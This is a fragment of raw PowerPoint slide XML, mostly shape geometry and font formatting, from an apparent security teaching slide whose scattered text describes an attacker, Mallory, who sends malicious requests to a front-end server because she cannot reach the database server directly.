                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y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070860" y="3909059"/>
            <a:ext cx="1264920" cy="2616835"/>
            <a:chOff x="3070860" y="3909059"/>
            <a:chExt cx="1264920" cy="261683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70860" y="3909059"/>
              <a:ext cx="819912" cy="81991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410077" y="4799964"/>
              <a:ext cx="925830" cy="1725930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="925829" h="1725929">
                  <a:moveTo>
                    <a:pt x="142875" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137274" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="139992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57251" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1590040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1590040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="71501"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="925829" h="1725929">
                  <a:moveTo>
                    <a:pt x="925703" y="1352931"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="920140" y="1325460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905014" y="1303007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882561" y="1287881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855091" y="1282319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572643" y="1282319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545160" y="1287881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522706" y="1303007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507580" y="1325460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502031" y="1352931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502031" y="1655191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507580" y="1682673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522706" y="1705127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545160" y="1720253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572643" y="1725803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855091" y="1725803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882561" y="1720253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905014" y="1705127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920140" y="1682673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925703" y="1655191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925703" y="1352931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3070351" y="7785913"/>
            <a:ext cx="79502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165" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y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53585" y="6159500"/>
            <a:ext cx="1416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20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58080" y="6047994"/>
            <a:ext cx="2425700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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Mal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>craft</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-4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dirty="0" sz="1600" spc="-10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dirty="0" sz="1600" spc="-10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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ma</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>iciou</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>re</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-6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dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-10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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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6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dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-9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50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-415">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600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dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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6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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er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036052" y="4242815"/>
            <a:ext cx="424180" cy="443865"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="424179" h="443864">
                <a:moveTo>
                  <a:pt x="353059" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70612" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43130" y="5550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20685" y="20685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5550" y="43130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="70612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="372872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5550" y="400353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20685" y="422798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43130" y="437933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70612" y="443484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353059" y="443484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380541" y="437933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402986" y="422798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418121" y="400353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423672" y="372872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423672" y="70612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418121" y="43130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402986" y="20685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380541" y="5550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353059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8178165" y="4320032"/>
            <a:ext cx="1416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20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539353" y="4091178"/>
            <a:ext cx="1925320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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-8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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ata</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ase  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>directly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815082" y="3828288"/>
            <a:ext cx="9533890" cy="3868420"/>
            <a:chOff x="2815082" y="3828288"/>
            <a:chExt cx="9533890" cy="3868420"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7223125" y="4763388"/>
              <a:ext cx="3682365" cy="2266315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3682365" h="2266315">
                  <a:moveTo>
                    <a:pt x="142875" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137274" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="139992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57251" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1590040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1590040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="71501"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3682365" h="2266315">
                  <a:moveTo>
                    <a:pt x="3648456" y="1059053"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3619779" y="1044702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3505581" y="987552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3505581" y="1044702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217805" y="1044702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217805" y="1073277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3505581" y="1073277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3505581" y="1130427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3619982" y="1073277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3648456" y="1059053"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3682365" h="2266315">
                  <a:moveTo>
                    <a:pt x="3682238" y="2180082"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="406400" y="2180082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406400" y="2122932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263525" y="2194433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406400" y="2265807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406400" y="2208657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682238" y="2208657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682238" y="2180082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1203686" y="6503670"/>
              <a:ext cx="559435" cy="736600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="559434" h="736600">
                  <a:moveTo>
                    <a:pt x="466090" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559308" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559308" y="93217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4660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1203686" y="6503670"/>
              <a:ext cx="559435" cy="736600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="559434" h="736600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="466090" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559308" y="93217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559308" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73609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1295125" y="6892289"/>
              <a:ext cx="392430" cy="226060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="392429" h="226059">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392049" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="392429" h="226059">
                  <a:moveTo>
                    <a:pt x="0" y="225551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392049" y="225551"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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25427" y="6958583"/>
              <a:ext cx="396240" cy="39623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53572" y="6778752"/>
              <a:ext cx="288035" cy="28651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1925300" y="6323076"/>
              <a:ext cx="424180" cy="441959"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="424179" h="441959">
                  <a:moveTo>
                    <a:pt x="353059" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70611" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43130" y="5550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20685" y="20685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5550" y="43130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="70612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="371348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5550" y="398829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20685" y="421274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43130" y="436409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70611" y="441960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353059" y="441960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380541" y="436409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402986" y="421274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418121" y="398829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423672" y="371348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423672" y="70612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418121" y="43130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402986" y="20685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380541" y="5550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353059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827782" y="6503670"/>
              <a:ext cx="558165" cy="736600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="558164" h="736600">
                  <a:moveTo>
                    <a:pt x="464819" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557783" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557783" y="92963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648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827782" y="6503670"/>
              <a:ext cx="558165" cy="736600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="558164" h="736600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
